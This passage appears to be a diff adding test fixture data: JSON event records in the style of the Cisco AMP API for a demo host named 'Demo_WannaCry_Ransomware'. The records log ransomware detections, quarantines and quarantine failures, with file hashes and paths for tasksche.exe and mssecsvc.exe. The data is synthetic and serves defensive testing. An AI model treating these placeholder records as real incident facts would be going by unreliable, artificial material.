pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
